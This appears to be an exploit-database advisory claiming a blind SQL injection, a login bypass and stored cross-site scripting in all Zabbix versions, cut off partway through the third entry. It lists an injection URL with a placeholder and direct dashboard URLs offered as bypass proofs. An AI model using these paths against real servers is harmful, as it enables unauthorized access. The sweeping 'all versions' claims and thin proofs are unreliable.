# Exploit Title: Zabbix all version / Multiple Vulnerabilities # Exploit Author: TaurusOmar # Twitter:@TaurusOmar # HomePage:taurusomar.com # Date: Jul 23th, 2021 # CVSS: 3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L # Version: Zabbix [1.x, 2.x, 3.x, 4,x 5.x] # Risk: High (9.0) # Vendor Homepage: https://www.zabbix.com/ # Tested on: Arch Linux # Greetz: PwnEc # Software Description: Zabbix is the ultimate enterprise-level software designed for real-time monitoring of millions of metrics collected from tens of thousands of servers, virtual machines and network devices. With encryption support it is possible to secure communications between separate Zabbix components (such as Zabbix server, proxies, agents and command-line utilities) using Transport Layer Security (TLS) protocol v.1.2. Certificate-based and pre-shared key-based encryption is supported. Encryption is optional and configurable for individual components. # 1.) Vulnerability Description => Blind Sqli (affect all versions): An error in the application allows executing sql statements blindly Path: https://domain/zabbix/hostinventoriesoverview.php?sid=[RANDOM_TOKEN]+Blind_Sqli&form_refresh=1&groupid=0&groupby=alias # 2.) Vulnerability Description => Bypass login (affect all versions): An error in the security of the form allows the login page to be skipped directly to the administration panel, which allows an attacker to access the entire application, managing to make queries, edit parameters, among others. Path: http://domain/zabbix/index.php Vulnerable Form:
Pocs Bypass login - access dashborad: http://domain/zabbix/zabbix.php?action=dashboard.list http://doamin/zabbix/zabbix.php?action=problem.view&ddreset=1 http://doamin/zabbix/overview.php?ddreset=1 http://doamin/zabbix/hostinventoriesoverview.php?ddreset=1 http://doamin/zabbix/screenconf.php # 3.) Vulnerability Description => Stored Cross Site Scripting (affect all versions): The application allows uploading an xml file which can be modified by the